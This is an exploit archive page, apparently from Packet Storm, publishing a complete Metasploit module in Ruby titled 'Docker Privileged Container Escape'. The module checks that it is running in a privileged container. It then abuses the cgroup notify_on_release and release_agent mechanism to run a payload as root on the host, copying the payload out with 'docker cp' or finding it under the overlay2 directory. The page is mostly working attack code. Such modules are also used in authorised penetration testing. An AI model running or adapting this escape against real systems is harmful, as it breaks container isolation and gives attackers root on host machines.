exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Docker Privileged Container Escape

Docker Privileged Container Escape
Posted Aug 6, 2020
Authored by stealthcopter | Site metasploit.com

This Metasploit module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release feature. This exploit should work against any container started with the following flags: --cap-add=SYS_ADMIN, --privileged.

tags | exploit, root
systems | linux
SHA-256 | 96e3dd9d2191efa268a444e84e7547c50e9a4480e50aec7c0ffb4d80ebaaaf32

Docker Privileged Container Escape

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# POC modified from https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Docker Privileged Container Escape',
'Description' => %q{
This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release
feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.
},
'License' => MSF_LICENSE,
'Author' => ['stealthcopter'],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
'Targets' => [['Automatic', {}]],
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0,
'References' => [
['EDB', '47147'],
['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
['URL', 'https://github.com/stealthcopter/deepce']
],
'DisclosureDate' => 'Jul 17 2019' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
}
)
)
register_advanced_options(
[
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptBool.new('ForcePayloadSearch', [false, 'Search for payload on the file system rather than copying it from container', false]),
OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', '/tmp']),
OptString.new('WritableHostDir', [true, 'A directory where we can write files inside on the host', '/tmp']),
]
)
end

def base_dir_container
datastore['WritableContainerDir'].to_s
end

def base_dir_host
datastore['WritableHostDir'].to_s
end

# Get the container id and check it's the expected 64 char hex string, otherwise return nil
def container_id
id = cmd_exec('basename $(cat /proc/1/cpuset)').chomp
unless id.match(/\A[\h]{64}\z/).nil?
id
end
end

# Check we have all the prerequisites to perform the escape
def check
# are in a docker container
unless file?('/.dockerenv')
return CheckCode::Safe('Not inside a Docker container')
end

# is root user
unless is_root?
return Exploit::CheckCode::Safe('Exploit requires root inside container')
end

# are rdma files present in /sys/
path = cmd_exec('ls -x /s*/fs/c*/*/r* | head -n1')
unless path.start_with? '/'
return Exploit::CheckCode::Safe('Required /sys/ files for exploitation not found, possibly old version of docker or not a privileged container.')
end

CheckCode::Appears('Inside Docker container and target appears vulnerable')
end

def exploit
unless writable? base_dir_container
fail_with Failure::BadConfig, "#{base_dir_container} is not writable"
end

pl = generate_payload_exe
exe_path = "#{base_dir_container}/#{rand_text_alpha(6..11)}"
print_status("Writing payload executable to '#{exe_path}'")

upload_and_chmodx(exe_path, pl)
register_file_for_cleanup(exe_path)

print_status('Executing script to exploit privileged container')

script = shell_script(exe_path)

vprint_status("Script: #{script}")
print_status(cmd_exec(script))

print_status "Waiting #{datastore['WfsDelay']}s for payload"
end

def shell_script(payload_path)
# The tricky bit is finding the payload on the host machine in order to execute it. The options here are
# 1. Find the file on the host operating system `find /var/lib/docker/overlay2/ -name 'JGsgvlU' -exec {} \;`
# 2. Copy the payload out of the container and execute it `docker cp containerid:/tmp/JGsgvlU /tmp/JGsgvlU && /tmp/JGsgvlU`

id = container_id
filename = File.basename(payload_path)

vprint_status("container id #{id}")

# If we cant find the id, or user requested it, search for the payload on the filesystem rather than copying it out of container
if id.nil? || datastore['ForcePayloadSearch']
# We couldn't find a container name, lets try and find the payload on the filesystem and then execute it
print_status('Searching for payload on host')
command = "find /var/lib/docker/overlay2/ -name '#{filename}' -exec {} \\;"
else
# We found a container id, copy the payload to host, then execute it
payload_path_host = "#{base_dir_host}/#{filename}"
print_status("Found container id #{container_id}, copying payload to host")
command = "docker cp #{id}:#{payload_path} #{payload_path_host}; #{payload_path_host}"
end

vprint_status(command)

# the cow variables are random filenames to use for the exploit
c = rand_text_alpha(6..8)
o = rand_text_alpha(6..8)
w = rand_text_alpha(6..8)

%{
d=$(dirname "$(ls -x /s*/fs/c*/*/r* | head -n1)")
mkdir -p "$d/#{w}"
echo 1 >"$d/#{w}/notify_on_release"
t="$(sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab)"
touch /#{o}
echo "$t/#{c}" >"$d/release_agent"
printf "#!/bin/sh\\n%s > %s/#{o}" "#{command}" "$t">/#{c}
chmod +x /#{c}
sh -c "echo 0 >$d/#{w}/cgroup.procs"
sleep 1
cat /#{o}
rm /#{c} /#{o}
}.strip.split("\n").map(&:strip).join(';')
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close